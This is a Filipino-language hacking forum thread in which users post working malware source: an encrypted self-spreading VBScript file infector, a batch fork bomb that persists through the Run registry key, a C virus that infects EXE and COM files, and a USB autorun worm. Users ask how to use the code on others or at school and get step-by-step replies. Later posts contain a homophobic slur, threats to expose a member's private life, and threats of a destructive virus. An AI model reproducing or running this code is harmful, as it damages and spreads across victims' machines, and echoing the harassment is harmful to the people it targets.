WsShell.RegWrite RegStr,FileName
End If
End Function

Function KJOboSub(CurrentString)
SubE = 0
TestOut = 0
Do While True
TestOut = TestOut + 1
If TestOut > 28 Then
CurrentString = FinalyDisk & ":\"
Exit Do
End If
On Error Resume Next
Set ThisFolder = FSO.GetFolder(CurrentString)
Set DicSub = CreateObject("Scripting.Dictionary")
Set Folders = ThisFolder.SubFolders
FolderCount = 0
For Each TempFolder in Folders
FolderCount = FolderCount + 1
DicSub.add FolderCount, TempFolder.Name
Next
If DicSub.Count = 0 Then
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentStrin g)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
SubE = 1
Else
If SubE = 0 Then
CurrentString = CurrentString & DicSub.Item(1) & "\"
Exit Do
Else
j = 0
For j = 1 To FolderCount
If LCase(SubString) = LCase(DicSub.Item(j)) Then
If j < FolderCount Then
CurrentString = CurrentString & DicSub.Item(j+1) & "\"
Exit Do
End If
End If
Next
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentStrin g)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
End If
End If
Loop
KJOboSub = CurrentString
End Function

Function KJPropagate()
On Error Resume Next
RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
DiskDegree = WsShell.RegRead(RegPathValue)
If DiskDegree = "" Then
DiskDegree = FinalyDisk & ":\"
End If
For i=1 to 5
DiskDegree = KJOboSub(DiskDegree)
KJummageFolder(DiskDegree)
Next
WsShell.RegWrite RegPathValue,DiskDegree
End Function

Function KJummageFolder(PathName)
On Error Resume Next
Set FolderName = FSO.GetFolder(PathName)
Set ThisFiles = FolderName.Files
HttExists = 0
For Each ThisFile In ThisFiles
FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
Call KJAppendTo(ThisFile.Path,"html")
ElseIf FileExt = "VBS" Then
Call KJAppendTo(ThisFile.Path,"vbs")
ElseIf FileExt = "HTT" Then
HttExists = 1
End If
Next
If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then
HttExists = 1
End If
If HttExists = 0 Then
FSO.CopyFile WinPath & "system32\desktop.ini",PathName
FSO.CopyFile WinPath & "web\Folder.htt",PathName
End If
End Function

Function KJSetDim()
On Error Resume Next
Err.Clear
TestIt = WScript.ScriptFullname
If Err Then
InWhere = "html"
Else
InWhere = "vbs"
End If
If InWhere = "vbs" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WsShell = CreateObject("WScript.Shell")
Else
Set AppleObject = document.applets("KJ_guest")
AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
Set WsShell = AppleObject.GetObject()
AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
AppleObject.createInstance()
Set FSO = AppleObject.GetObject()
End If
Set DiskObject = FSO.Drives
For Each DiskTemp In DiskObject
If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
Exit For
End If
FinalyDisk = DiskTemp.DriveLetter
Next
Dim OtherArr(3)
Randomize
For i=0 To 3
OtherArr(i) = Int((9 * Rnd))
Next
TempString = ""
For i=1 To Len(ThisText)
TempNum = Asc(Mid(ThisText,i,1))
If TempNum = 13 Then
TempNum = 28
ElseIf TempNum = 10 Then
TempNum = 29
End If
TempChar = Chr(TempNum - OtherArr(i Mod 4))
If TempChar = Chr(34) Then
TempChar = Chr(18)
End If
TempString = TempString & TempChar
Next
UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
ThisText = "ExeString = """ & TempString & """"
HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
WinPath = FSO.GetSpecialFolder(0) & "\"
If (FSO.FileExists(WinPath & "web\Folder.htt")) Then
FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif"
End If
If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & "system32\kjwall.gif"
End If
End Function

hirap talaga i-recompile kapag decompiled, kasi di kasama yung ibang code library, lalo na kung user-define library..


mas madali pa ang VBS Virus:giggle:


saka available sa net ung source code:lol:

ITo naman BAt. file Maiinis ka lng naman dito kc ako uminit ulo ko...


@echo off
del C:\1.reg
>>"C:\1.reg" ECHO Windows Registry Editor Version 5.00
>>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\windows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\windows\\2.bat"
>>"C:\1.reg" ECHO "autoexec"="c:\\windows\\3.bat"
regedit.exe /s C:\1.reg

>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\windows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\windows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\windows\3.bat
>>"C:\2.bat" ECHO start C:\windows\1.bat
>>"C:\2.bat" ECHO start C:\windows\2.bat
>>"C:\2.bat" ECHO start C:\windows\3.bat
>>"C:\2.bat" ECHO goto 1

start C:\2.bat


save as anything.bat

Dont Try mGA pArekoy ha... pang pasakit ng Ulo YAn....

panu ba to gamitin? gs2 ko malaman? pde paturo cnu pde mag turo sken? :D ahehe

panu ba to gamitin? gs2 ko malaman? pde paturo cnu pde mag turo sken? :D ahehe

simple lang. just copy that codes into notepad and save it into .bat file. but if i were you, don't do this harmful things. someday, you won't know, this thing will be affect and get slow your system. so the good thing to do is find out solution on how to keep away this in our system when we're getting infected with this. :D

pde po ba ito isend sa ibang friend mo ng d mo alam? un bang parang boot na isesend mo lan?
pde po ba un? curious lang XD

pde po ba ito isend sa ibang friend mo ng d mo alam? un bang parang boot na isesend mo lan?
pde po ba un? curious lang XD

kaya yun ng mga boot virus... basta mga Visual Basic Script kaya yun eh... maaapektuhan ng PC na may virus yung floppy disk or memory stick tapos magrereplicate agad yun pag na-open mo na yung disk mo...

....kakaasr nga ung taga lipa are VIRUS kc lagi q nre2frmat ung FD q kc my gann virus sa BRGY nmn n lagi qng pinasa2ksakan...tas pagsa2sak q sa comp q detect xa ng KIS eh..........peo ndi xa mwala kya reformat q nlng xa....panu b tanggalin un!?i-refomat b ung pc sa BRGY para mwala ung virus dun!?!?

try mo nman ibang antivirus.. then punta ka sa brgy nyo ulit. pahawa mo ulit usb mo.. then try mo ulit sa pc mo.. try and try until youre protected of viruses from your brgy.. try mo eset.. pag hindi nadetect ng eset, isubmit mo for analysis.. para maupdate viruslist din namin from eset.. ;)

para sa marunong ng Assembly Language (ASM)

Win32.Magic.7045 is a 7045 bytes runtime/direct action EXE virus. Infects
all files in all directories at drive C:, D:, E: and F:, when executed, by
every file in current directory and Windows directory, when executed, by
prepending the virus to the original EXE file.

Win32.Bogus.4096 is a 4096 bytes runtime/direct action EXE virus. Infects
first file in current directory, when executed, by prepending the virus to
the original EXE file.

buti na lang konti lang nakakaalam kung anong language ginamit dyan ;)

(pag may nakakaalam, wag sabihin. mamaya mapagtripan at icompile yan :slap:)

korek ka dyan. alam ko kung anong languages ginamit pero inde ko sasabihin.... hehe:salute:

para sa marunong ng Assembly Language (ASM)

Win32.Magic.7045 is a 7045 bytes runtime/direct action EXE virus. Infects
all files in all directories at drive C:, D:, E: and F:, when executed, by
every file in current directory and Windows directory, when executed, by
prepending the virus to the original EXE file.

Win32.Bogus.4096 is a 4096 bytes runtime/direct action EXE virus. Infects
first file in current directory, when executed, by prepending the virus to
the original EXE file.

puro gawa yan sa assembly language ah..

Turbo assembler ang ginamit para macompile yan..

puro gawa yan sa assembly language ah..

Turbo assembler ang ginamit para macompile yan..

kunyari hindi mo sinabi :slap:

halata naman eh.. :lmao:

ayos ung i love you virus buti nlng na post dito sa symbian.... pwede pang imodify...

ayos ung i love you virus buti nlng na post dito sa symbian.... pwede pang imodify...

:slap: another virus maker :madslap:

waaaaahooo may virus codes na akong makukuha wahahahaa
maghasik na ng lagim sa school!!!
:boogie::boogie::boogie:

ano pong file type i sasave ko?

may virus na nakikita? di naman alam :slap: wag mo na pangarapin... baka makick-out ka pa sa school... kahit txt file palng yan eh kaya na madetect... good as virus na ung iluvu virus

panu po ba to gamitin?
:D

ano bang effect sa pc mo ng "taga lipa are" na virus?

yes! :clap: additional viruses!

madami yata ditong mga virus modifiers ah:slap:

uu nga po pano ito gamitin!:thumbsup:

gn2 po ba pinag aaralan ng mga programmer?
patulong naman kung panu ito gmitin sa iba XD try lang

copy the code in notepad then save it as .asm or.vbs

add lang po:

c-virus


/* C-Virus: A generic .COM and .EXE infector

Written by Nowhere Man

Project started and completed on 6-24-91

Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too)
*/


#pragma inline // Compile to .ASM

#include
#include
#include
#include
#include

void hostile_activity(void);
int infected(char *);
void spread(char *, char *);
void small_print(char *);
char *victim(void);

#define DEBUG
#define ONE_KAY 1024 // 1k
#define TOO_SMALL ((6 * ONE_KAY) + 300) // 6k+ size minimum
#define SIGNATURE "NMAN" // Sign of infection

int main(void)
{
/* The main program */

spread(_argv[0], victim()); // Perform infection
small_print("Out of memory\r\n"); // Print phony error
return(1); // Fake failure...
}

void hostile_activity(void)
{
/* Put whatever you feel like doing here...I chose to
make this part harmless, but if you're feeling
nasty, go ahead and have some fun... */

small_print("\a\a\aAll files infected. Mission complete.\r\n");
exit(2);
}

int infected(char *fname)
{
/* This function determines if fname is infected */

FILE *fp; // File handle
char sig[5]; // Virus signature

fp = fopen(fname, "rb");
fseek(fp, 28L, SEEK_SET);
fread(sig, sizeof(sig) - 1, 1, fp);
#ifdef DEBUG
printf("Signature for %s: %s\n", fname, sig);
#endif
fclose(fp);
return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);
}

void small_print(char *string)
{
/* This function is a small, quick print routine */

asm {
push si
mov si,string
mov ah,0xE
}

print: asm {
lodsb
or al,al
je finish
int 0x10
jmp short print
}
finish: asm pop si
}

void spread(char *old_name, char *new_name)
{
/* This function infects new_name with old_name */


/* Variable declarations */

FILE *old, *new; // File handles
struct ftime file_time; // Old file date,
time
int attrib; // Old attributes
long old_size, virus_size; // Sizes of files
char *virus_code = NULL; // Pointer to virus
int old_handle, new_handle; // Handles for files


/* Perform the infection */

#ifdef DEBUG
printf("Infecting %s with %s...\n", new_name, old_name);
#endif
old = fopen(old_name, "rb"); // Open virus
new = fopen(new_name, "rb"); // Open victim
old_handle = fileno(old); // Get file handles
new_handle = fileno(new);
old_size = filelength(new_handle); // Get old file size
virus_size = filelength(old_handle); // Get virus size
attrib = _chmod(new_name, 0); // Get old attributes
getftime(new_handle, &file_time); // Get old file time
fclose(new); // Close the virusee
_chmod(new_name, 1, 0); // Clear any read-only
unlink(new_name); // Erase old file
new = fopen(new_name, "wb"); // Open new virus
new_handle = fileno(new);
virus_code = malloc(virus_size); // Allocate space
fread(virus_code, virus_size, 1, old); // Read virus from old
fwrite(virus_code, virus_size, 1, new); // Copy virus to new
_chmod(new_name, 1, attrib); // Replace attributes
chsize(new_handle, old_size); // Replace old size
setftime(new_handle, &file_time); // Replace old time


/* Clean up */

fcloseall(); // Close files
free(virus_code); // Free memory
}

char *victim(void)
{
/* This function returns the virus's next victim */


/* Variable declarations */

char *types[] = {"*.EXE", "*.COM"}; // Potential victims
static struct ffblk ffblk; // DOS file block
int done; // Indicates finish
int index; // Used for loop


/* Find our victim */

if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))
return(_argv[1]);

for (index = 0; index < sizeof(types); index++) {
done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
FA_SYSTEM | FA_ARCH);
while (!done) {
#ifdef DEBUG
printf("Scanning %s...\n", ffblk.ff_name);
#endif
/* If you want to check for specific days of the week,
months, etc., here is the place to insert the
code (don't forget to "#include "!) */

if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
TOO_SMALL))
return(ffblk.ff_name);
done = findnext(&ffblk);
}
}


/* If there are no files left to infect, have a little fun... */

hostile_activity();
return(0); // Prevents warning
}

bakit ayaw ma-save kahit sa notepad lang? :noidea: sabi na anti-virus ko. possible treat, file deleted :D :lol::rofl::lmao:

salamat sa mga nag post nito. napatunayan ko na hindi dekorasyon lang ang anti-virus na gamit ko :praise:

galeng ng bitdefender, ala lumusot, updated kc eh, nyahahaha nagtry kc ako ng sample.... pro mga sir, ok lng po matutunan itong gnitong mga bagay, pro used the knowledge for good... Great Knowledge comes with Great Responsibility, nyahahaha.... :D

di ko gets kung pano toh gamitin... more on hardware kasi ung knowledge ko... pano ba ito i execute??? save sa notepad then???

LIPA virus code is fake, LIPA viurs is not original, pinoy talaga hilig edit edit para feel nya sikat cya para sa hindi naka alam. :beat:

iLOVEyou VIRUS infects internet mail in one single time, and does not infect freely but manually.

Great Code :noidea:

I made one, last 1998, virusname:diehard3, but didn't last long because of 32bit OS system. :upset:

:salute: :nice: :thanks:

:wow:andami, pano po ba ito gamitin?

:wow:andami, pano po ba ito gamitin?

I THINK HINDI ITO GINAGAMIT KUNDI PINAGAARALAN PARA MAS MAPALAWAK ANG IYONG KAALAMAN SA PROGRAMMING AT SA MGA WEAKNESSES NG MGA COMPUTER SYSTEMS...:salute:

mga sir share nyo virus code using flash drive when you plug it the program will execute..thanks..

kng issave niyo ito at nddetect ng AV niyo at trip niyo tlgang isave(not compile) turn off niyo muna ang AV niyo

mga sir share nyo virus code using flash drive when you plug it the program will execute..thanks..

copy mo lang to sa notepad then save as autorun.inf then copy mo sa flash drive where your virus is located...


[XXXXXX]
XXXXXXX=virus.exe
XXXXXXXXXXX=virus.exe

copy mo lang to sa notepad then save as autorun.inf then copy mo sa flash drive where your virus is located...

thanks ,i will try..hehe

DON'T BE ONE OF THE KSP(Kulang Sa Pansen).

THIS IS ILLEGAL.
DELETE THIS THREAD PLEASE.

THIS THINGS NEED NOT TO BE PUBLISH.
IF YOU KNOW SOMETHING(dangerous/illegal) KEEP IT TO YOUR SELF.

IF YOUR TELLING THAT SHARING IS GOOD, YES, IT IS GOOD, BUT ONLY IF YOU SHARE GOOD MATTERS FOR THEM.

hay. . . . . . .produkto lang nmn ito ng Visual basic at Visual c++
meron akong program nito sa bahay(galing sa school) at binalaan ako na wag gagawa ng virus . . . .

hmm . . a can't say if this one is a good post or not . . but thanks . . . i'm now aware of that . . . (kasi nga computer programmer ako:D hehehe)


i think that you know a lot of things upon that . . . . .

and i think you can generate a crack or keygen perhaps? :lol: bsta bro . . . . compliment ko lng ung pag post mo ng babala :thumbsup: kc muntik ko ng subukan 2 . . . hehehe bute cnabe sakin n malakas ang epekto nito sa pc . . . . . .

....kakaasr nga ung taga lipa are VIRUS kc lagi q nre2frmat ung FD q kc my gann virus sa BRGY nmn n lagi qng pinasa2ksakan...tas pagsa2sak q sa comp q detect xa ng KIS eh..........peo ndi xa mwala kya reformat q nlng xa....panu b tanggalin un!?i-refomat b ung pc sa BRGY para mwala ung virus dun!?!?

try m 2..
http://www.symbianize.com/showthread.php?p=547756#post547756

gn2 po ba pinag aaralan ng mga programmer?
patulong naman kung panu ito gmitin sa iba XD try lang

depende sa programmer. para sa akin hindi kasi system programmer ako.

LIPA virus code is fake, LIPA viurs is not original, pinoy talaga hilig edit edit para feel nya sikat cya para sa hindi naka alam. :beat:

iLOVEyou VIRUS infects internet mail in one single time, and does not infect freely but manually.

Great Code :noidea:

I made one, last 1998, virusname:diehard3, but didn't last long because of 32bit OS system. :upset:

:salute: :nice: :thanks:

i agree. pero okey din naman ang taga lipa are kasi mey naka lagay naman na edited lang.

copy mo lang to sa notepad then save as autorun.inf then copy mo sa flash drive where your virus is located...

the autorun.inf should be located in a fixed drive
eg.
C:\autorun.inf
D:\autorun.inf
E:\autorun.inf
...
not anywhere or else di lalabas sa context menu ng drive ang "autoplay"

hay. . . . . . .produkto lang nmn ito ng Visual basic at Visual c++
meron akong program nito sa bahay(galing sa school) at binalaan ako na wag gagawa ng virus . . . .

hmm . . a can't say if this one is a good post or not . . but thanks . . . i'm now aware of that . . . (kasi nga computer programmer ako:D hehehe)


i think that you know a lot of things upon that . . . . .

and i think you can generate a crack or keygen perhaps? :lol: bsta bro . . . . compliment ko lng ung pag post mo ng babala :thumbsup: kc muntik ko ng subukan 2 . . . hehehe bute cnabe sakin n malakas ang epekto nito sa pc . . . . . .


di po producto ng visual basic at visual c++ ang virus. eto po tama .vbs(visual basic script), asm(assembly), .c, c++, etc.

didn't you mean na ignorante and mga computer programmer sa virus, i think not. computer programmer are application developer remember? and i am a one of them.

di po producto ng visual basic at visual c++ ang virus. eto po tama .vbs(visual basic script), asm(assembly), .c, c++, etc.

didn't you mean na ignorante and mga computer programmer sa virus, i think not. computer programmer are application developer remember? and i am a one of them.

ay mukhang mali ung nasabi ko hehehe (kasi isa p nmn akong computer programmer)
hehehe sorry . . . . pero alam ko na ito ay nagagawa ng nasabi kong application (visual studio and visual c++) hehehe

@ROCAROCAROBIN


DON'T BE ONE OF THE KSP(Kulang Sa Pansen).

THIS IS ILLEGAL.
DELETE THIS THREAD PLEASE.

THIS THINGS NEED NOT TO BE PUBLISH.
IF YOU KNOW SOMETHING(dangerous/illegal) KEEP IT TO YOUR SELF.

IF YOUR TELLING THAT SHARING IS GOOD, YES, IT IS GOOD, BUT ONLY IF YOU SHARE GOOD MATTERS FOR THEM.

ARE YOU HAPPY NOW!

panu ba magcompile? share nyo nMan poh. .

panu ba magcompile? share nyo nMan poh. .

Hindi ata macocompile tong mga source codes dito kasi hindi complete yung mga nakapost dito...It is just posted here to give you an idea on how a virus is made....

download na lang kayo ng compiler:lol:

Pahingi pa...

Nagtetake 'din kami nyan sa school eh...

Kaya lang sa self-study ka rin mapapadpad...

Lalu na yung pang TC...

Thanks...

ngek kuha ka pa source code kung talagang programer ka gawa k ng own virus with you own knowledge. di mo n need yung source code ang nid mo lang malaman ano yung ginagawa ng virus sa computer para malaman mo kung ano gagawin mo.. and dapat my knowledge ka sa assembly..

wow..astig to..haba nung i love you virus..hehe..macompile nga sa mga computer shop..wahahaha..joke lng:excited::excited:
gnda siguro gumawa ng sariling virus noh..hahaha..no idea kc kung wat type of virus eh..hehehe, wala p din akong experience, pro kung ggs2hin matututunan nmn. teka2..khit ba txt file sya nadedetect?d ko p nttry un ah..haha

ito hindi virus experiment lang kuha ka ng usb to usb kun dalawa pc mo iconnect m yung dalawang usb nila ....... hehehehehee

LIPA virus code is fake, LIPA viurs is not original, pinoy talaga hilig edit edit para feel nya sikat cya para sa hindi naka alam. :beat:

iLOVEyou VIRUS infects internet mail in one single time, and does not infect freely but manually.

Great Code :noidea:

I made one, last 1998, virusname:diehard3, but didn't last long because of 32bit OS system. :upset:

:salute: :nice: :thanks:

Diehard3??? wala yata akong naabutan na ganung virus. Lam ko hanggang Diehard2 lang yung eh..

Baka palabas yung Diehard3 wahehehehe..:rofl:

Lam mo, kung marunong ka talagang gumawa ng virus, hindi mo na kinakailangang ipagmalaki at ipagyabang. Ikalat mo, para feeling sikat ka di ba?

Tingnan mo si Jonjon Gumba na gumawa nung Possessed Virus, andun pa name ng school nya. Yung pinagmamalaki mong virus na Diehard3 eh asan? Ni hindi nga gumawa ng ingay eh..

Specially, wala sa google :slap:

You will now me soon ka pang nalalaman.. Aysus!! :slap:

:upset: Hay..

Sorry mga mods, di lang ako makapagpigil sa hangin ni RocaRobin eh, senxa na po..

LIPA virus code is fake, LIPA viurs is not original, pinoy talaga hilig edit edit para feel nya sikat cya para sa hindi naka alam.

Ikaw nga eh, your so-called "DieHard3" eh ginaya mo lang ung name nung DieHard virus.. So, sino mas manggaya?


iLOVEyou VIRUS infects internet mail in one single time, and does not infect freely but manually.
Great Code :noidea:


Lahat ng virus eh kailangan ng user interaction. Alangan namang gumawa ka ng program, tapos kusang mag-execute mag-isa.. :slap:

& insecure ka ba sa ILOVEYOU virus kasi nagspread sya worldwide? Your so-called "DieHard3" eh DOS-based lang, kaya ngal-ngal ka nung nagkaroon ng 32-bit OS? :slap:

Hanggang floppy drive ka lang.. :rofl: :rofl: :rofl:

Code of IMGKULOT (jamesgo.dll)

Use at your own risk.


'imgkulot v1.0
'Iloilo City Phils
'email me if you found this :) @ jamesgo.dll@gmail.com
'edited from imgkulot on july 2007
on error resume next
Set WshShell =CreateObject("WScript.Shell")


For i=1 to 1

set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\test.vbs" then
isdir=true
else
a=WshShell.Run("test.bat Open" ,0,False)
a=WshShell.Run("winword " ,1,False)
isdir=false
end if

For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("test.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\test.*",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.ico",d&"\",True
else
Of.CopyFile "test.*",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.ico",d&"\",True
end if
a=WshShell.Run("test.bat + "&d ,0,True)
End If
next

if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("test.bat - "&dir ,0,True)
Of.CopyFile "test.*",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "autorun.ico",dir&"\",True
a=WshShell.Run("test.bat + "&dir ,0,True)
end if

next



Open Notepad, save it as TEST.VBS.

Diehard3??? wala yata akong naabutan na ganung virus. Lam ko hanggang Diehard2 lang yung eh..

Baka palabas yung Diehard3 wahehehehe..:rofl:

Lam mo, kung marunong ka talagang gumawa ng virus, hindi mo na kinakailangang ipagmalaki at ipagyabang. Ikalat mo, para feeling sikat ka di ba?

Tingnan mo si Jonjon Gumba na gumawa nung Possessed Virus, andun pa name ng school nya. Yung pinagmamalaki mong virus na Diehard3 eh asan? Ni hindi nga gumawa ng ingay eh..

Specially, wala sa google :slap:

You will now me soon ka pang nalalaman.. Aysus!! :slap:

:upset: Hay..

Sorry mga mods, di lang ako makapagpigil sa hangin ni RocaRobin eh, senxa na po..

Hay nako, sinabi ko, hindi sya nag tagal dahil sa 32 winsys, mag basa ka muna, bago ka mag reclamo. :dance:

Egnorante ka talaga, bata kapa nong una kung ginawang virus, elang taon kanaba, cguro mga teens kapalang, samantalang aku on going 38 na. Veterano na. ilagay mo sa isip yan. :lmao:

Atsaka, Possessed Virus? hindi ko rin kilala gumawa nyan. :rofl:

EGNORANTE. kawawang bata, marami pang gatas sa labi, hindi makapag bili kung hindi hihingi pasa nanay. :weep: :lol:

Hintay kalang sa bagokung virus, at ekaw ang onang mag test, para malaman mo, na format na hardisk mo, na delete na bios mem mo, at sana makuha kong papotok ng monitor mo. :lmao: What a kid ka Yueh, Research mo muna kinakausap mo.
Gusto mong elantad ko dto secreto mo, bago palang kita nakita sa mall, nakipaglandi sa kasama mong lalaki. BAKLA ka talaga Yueh. :)
Wag mo akung insultuhin Yueh or elantad ko na rin sa internet bou mong pagkatao, pati nga close friends mo hindi alam secreto mo, malas molang at nakita kita sa likod ng mall.
Gumawa ka nalang ng antivirus, kaisa makipag landi, masgaganahan pa papa at mama mu. :p

Hintay kalang sa bagokung virus, at ekaw ang onang mag test, para malaman mo, na format na hardisk mo, na delete na bios mem mo, at sana makuha kong papotok ng monitor mo. :lmao: What a kid ka Yueh, Research mo muna kinakausap mo.
Gusto mong elantad ko dto secreto mo, bago palang kita nakita sa mall, nakipaglandi sa kasama mong lalaki. BAKLA ka talaga Yueh. :)
Wag mo akung insultuhin Yueh or elantad ko na rin sa internet bou mong pagkatao, pati nga close friends mo hindi alam secreto mo, malas molang at nakita kita sa likod ng mall.
Gumawa ka nalang ng antivirus, kaisa makipag landi, masgaganahan pa papa at mama mu. :p



Hay nako wala ka na ba talagang magawa kundi mangaway dito...:beat: At bigyan mo rin ako nyang virus mo ha medyo madilim na kasi monitor ko gusto ko na palitan nang bago... And sana yung virus mo parang sa DIEHARD 2 hindi ko binabanggit yung virus mo ah yung sa movie na kapag priness ang delete eh may C4 na sasabog sa PC:rofl: Excited na ako sa new virus mo...:rofl::rofl::rofl::rofl::rofl::rofl:

Alam mo AeDo40, nakuhamu cracking for 1year and a Half, ang galing mo talaga, samantalang aku 1-week, walapang nagturo sa akin, walapang tuturial. At samantalang kayo, gumagaling lang sa tuturial :clap: What a kids stuff, kala nyo magaling na kyo. What a fool. :excited:

Gudlak sa nalalaman nyo, dahil hangan dyan nalang kyo. :dance:

Alam mo AeDo40, nakuhamu cracking for 1year and a Half, ang galing mo talaga, samantalang aku 1-week, walapang nagturo sa akin, walapang tuturial. At samantalang kayo, gumagaling lang sa tuturial :clap: What a kids stuff, kala nyo magaling na kyo. What a fool. :excited:

Gudlak sa nalalaman nyo, dahil hangan dyan nalang kyo. :dance:

ang yabang mo naman pare. ano bang alam mo sa totoo programming? sabihin mo sakin ang alam mong mga PL at makikipagtoos ako sayo. tingnan natin and hangin mo. baka bad breath lang yan e tooth brush mo nga.

Hay nako, sinabi ko, hindi sya nag tagal dahil sa 32 winsys, mag basa ka muna, bago ka mag reclamo. :dance:

Egnorante ka talaga, bata kapa nong una kung ginawang virus, elang taon kanaba, cguro mga teens kapalang, samantalang aku on going 38 na. Veterano na. ilagay mo sa isip yan. :lmao:

Atsaka, Possessed Virus? hindi ko rin kilala gumawa nyan. :rofl:

EGNORANTE. kawawang bata, marami pang gatas sa labi, hindi makapag bili kung hindi hihingi pasa nanay. :weep: :lol:


Nakakatawa ka, lam mo yun..

Yung Possessed Virus, hindi mo alam? tapos sinasabi mong beterano ka? :lol: :lol: :lol:

Pinagmamalaki mong gumawa ka ng virus na hindi sumikat!?! :lol: :lol: :lol: :lol: :lol:

Siguro panay ganito ginagawa mo noh - :upset:

wawa :lol: :lol: :lol:

Hintay kalang sa bagokung virus, at ekaw ang onang mag test, para malaman mo, na format na hardisk mo, na delete na bios mem mo, at sana makuha kong papotok ng monitor mo. :lmao: What a kid ka Yueh, Research mo muna kinakausap mo.
Gusto mong elantad ko dto secreto mo, bago palang kita nakita sa mall, nakipaglandi sa kasama mong lalaki. BAKLA ka talaga Yueh. :)
Wag mo akung insultuhin Yueh or elantad ko na rin sa internet bou mong pagkatao, pati nga close friends mo hindi alam secreto mo, malas molang at nakita kita sa likod ng mall.
Gumawa ka nalang ng antivirus, kaisa makipag landi, masgaganahan pa papa at mama mu. :p

Nakakatawa ka..

Pano mo ko makikita, eh nasa Cagayan De Oro ka at nasa Maynila ako? :lol: :lol: :lol:

Gulat ka at nalaman ko noh? :clap:

& with those kind of comments, isa kang isip-bata at pala-gawa ng istorya

P.S. Baka naman panaginip mo lang yung DieHard3 mo, hindi kaya? :lol: :lol: :lol: :lol: :lol:

Hay nako wala ka na ba talagang magawa kundi mangaway dito...:beat: At bigyan mo rin ako nyang virus mo ha medyo madilim na kasi monitor ko gusto ko na palitan nang bago... And sana yung virus mo parang sa DIEHARD 2 hindi ko binabanggit yung virus mo ah yung sa movie na kapag priness ang delete eh may C4 na sasabog sa PC:rofl: Excited na ako sa new virus mo...:rofl::rofl::rofl::rofl::rofl::rofl:

DieHard 4 un di ba? san na yung DieHard3? :rofl:

mga bossing bakit pag click for sa first page may virus daw? :noidea:

http://www.symbianize.com/showthread.php?t=30055

